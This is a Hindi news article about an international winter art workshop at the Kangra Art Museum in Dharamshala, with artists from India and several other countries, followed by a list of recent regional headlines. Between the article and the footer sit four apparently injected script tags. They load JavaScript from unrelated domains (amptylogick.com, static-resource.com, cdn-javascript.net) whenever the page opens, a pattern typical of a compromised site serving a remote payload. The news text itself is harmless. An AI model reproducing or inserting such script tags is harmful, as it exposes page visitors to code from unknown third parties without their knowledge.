Categories: हिमाचल

कांगड़ा आर्ट म्यूजियम में चल रही इंटरनेशनल विंटर आर्ट वर्कशॉप, देश सहित विदेश के कलाकार भी दिखा रहे हूनर

<p>पर्यटन नगरी धर्मशाला में देश-विदेश के कलाकार नेचर को रंगों में उकेर रहे हैं। कांगड़ा आर्ट म्यूजियम में चल रही इंटरनेशनल विंटर आर्ट वर्कशॉप में देश-विदेश के कलाकार अपना चित्रकारी का हूनर दिखा रहे हैं। इसमें भारत सहित अन्य आधा दर्जन करीब देशों के नामी कलाकार विशेष रूप से भाग लेने के लिए पहुंचे हैं। कलाकारों द्वारा हिमाचल की खूबसूरत वादियां और यहां के जीवन को केनवस पर उतारा जा रहा है। वर्कशॉप में खूबसूरत पेंटिंग और नेचर फोटोग्राफी की प्रदर्शनी भी लगाई गई है। सोसायटी फॉर प्रोबेल प्रमाणिक एकेडमी ऑफ आर्टस पंजाब, कांगड़ा कला संग्रहालय और जलेश्वर आर्ट फांउडेशन उड़ीसा द्वारा कार्यक्रम का आयोजन किया जा रहा है। इसमें भारत के अलावा थाइलैंड, सलोवेनिया, वियतनाम और नेपाल के 30 से अधिक कलाकार भाग ले रहे हैं।</p>

<p>कार्यक्रम का आयोजन मुख्य रूप से एक-दूसरे देशों की प्रतिभाओं को एक मंच पर एकत्रित करके उसमें अधिक निखार करना है। साथ ही हिमाचल की खूबसूरती को केनवश पर उतार कर देश-विदेश तक पहुंचाना भी है। इसके साथ ही पेंटिंग और नेचर फोटोग्राफी से प्रदूषण मुक्त वातावरण का संदेश भी दिया जा रहा है। बता दें कि यह वर्कशॉप 1 दिसंबर से शुरु हुई है और 7 दिसंबर तक चलेगी।</p>

<p>कांगड़ा आर्ट म्यूजियम की प्रभारी रितू मनकोटिया ने कहा कि वर्कशॉप में भाग ले रहे देश-विदेश के कलाकारों ने यहां रहकर जो देखा है, उसे रंगों में उकेरा है। कलाकारों द्वारा बनाई गई अधिकतर पेंटिंग्स प्रकृति पर आधारित हैं। उधर आर्टस सोसायटी के अध्यक्ष आरूप चंद्र का कहना है कि अंतरराष्ट्रीय आयोजन का हिमाचल धर्मशाला में होने से पर्यटन नगरी को एक नई पहचान मिलेगी। देश-विदेश के कलाकार अपने केनवस पर यहां की सुंदरता को उतार रहे हैं, जो कि विश्व भर में पहुंच पाएगी।</p>

<p>&nbsp;</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1575543651620″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

चंडीगढ़ सेक्टर 42 कॉलेज में हिमाचल की बेटी ने प्रेरणा ने मारी बाजी

चंडीगढ़ सेक्टर-42 के गवर्नमेंट पीजी गर्ल्स कॉलेज में चल रही चुनाव में हिमाचल प्रदेश के…

16 hours ago

संजौली मस्जिद विवाद को लेकर एमसी आयुक्त के कोर्ट में सुनवाई

सबंधित जेई और वक्फ बोर्ड को लगी फटकार, मामले की 5 अक्टूबर को अगली सुनवाई,जेई…

17 hours ago

इंस्पायर मानक अवार्ड के लिए 15 सितंबर तक छात्र करवा सकते है आवेदन

हमीरपुर, कांगड़ा व चंबा के छात्र लेंगे भाग अभी तक कई स्कूलों ने नहीं किया…

17 hours ago

निबंध लेखन में रितिका ने हासिल किया पहला स्थान

भाषा-संस्कृति विभाग जिला कांगडा़ द्वारा जिला स्तरीय राजभाषा हिन्दीं पखवाडे का आयोजन जी.ए.वी स्कूल कांगडा…

17 hours ago

परशुराम चौक बाजार में जलभराव की समस्या से मिली निजात, व्यापारी खुश

पांवटा साहिब- शहर में जल भराव की समस्या से निपटने के लिए नगर निगम द्वारा…

17 hours ago

राज्य में खेल गतिविधियों को बढ़ावा देने के लिए प्रदेश सरकार प्रतिबद्धः केवल पठानिया

धर्मशाला, 6 सितम्बर: उपमुख्य सचेतक व विधायक शाहपुर केवल सिंह पठानिया ने आज शाहपुर विधानसभा…

1 day ago